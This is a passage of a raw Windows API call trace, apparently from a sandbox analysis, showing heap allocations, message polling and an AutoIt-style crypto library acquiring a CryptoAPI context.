0x2e54558 [0186.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0186.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0186.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0186.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0186.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0186.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0186.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0186.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0186.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0186.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0186.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0186.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0186.539] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0186.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0186.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0186.540] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0186.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0186.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0186.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0186.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0186.540] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0186.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0186.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff10 [0186.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0186.540] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0186.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff10 | out: hHeap=0x970000) returned 1 [0186.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0186.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0186.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0186.540] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0186.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0186.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0186.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0186.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0186.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0186.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0186.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0186.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0186.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0186.541] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0186.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0186.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0186.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0186.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0186.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0186.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0186.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0186.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0186.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0186.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0186.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0186.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0186.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0186.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0186.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0186.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0186.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0186.542] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0186.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0186.542] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0186.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0186.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0186.542] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0186.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0186.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c38 [0186.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0186.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0186.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0186.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e503f8 [0186.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0186.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0186.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0186.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0186.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0186.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0186.543] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0186.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0186.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0186.543] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0186.543] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0186.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0186.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0186.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0186.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0186.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0186.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0186.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0186.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0186.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0186.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0186.543] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0186.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0186.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0186.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0186.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0186.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0186.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0186.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0186.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0186.544] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0186.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0186.544] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0186.544] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.544] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0186.544] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0186.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69b08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0186.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0186.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0186.545] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0186.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0186.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0186.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0186.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80220 [0186.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0186.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0186.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0186.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69b48 [0186.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69b48, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0186.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0186.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0186.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0186.546] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0186.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0186.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0186.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80220 | out: hHeap=0x970000) returned 1 [0186.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0186.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0186.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0186.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0186.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0186.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0186.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0186.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0186.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0186.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0186.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0186.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0186.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0186.546] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0186.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0186.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0186.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0186.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0186.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0186.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0186.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0186.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0186.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0186.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0186.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0186.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0186.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0186.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0186.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0186.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0186.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0186.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0186.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0186.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0186.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0186.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0186.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0186.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0186.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0186.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0186.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0186.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0186.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0186.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0186.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0186.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0186.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0186.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0186.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0186.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0186.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0186.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0186.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0186.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0186.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0186.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0186.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0186.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0186.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0186.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0186.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0186.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0186.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0186.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0186.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0186.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0186.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0186.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0186.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0186.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0186.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0186.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0186.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0186.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0186.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0186.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0186.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0186.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0186.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0186.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0186.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0186.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0186.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0186.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0186.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0186.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0186.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0186.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0186.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0186.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0186.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0186.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0186.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0186.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0186.551] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0186.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0186.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0186.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0186.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0186.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0186.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0186.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0186.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0186.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0186.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0186.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0186.552] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0186.552] RtlAllocateHeap (HeapHandle=0x970000, 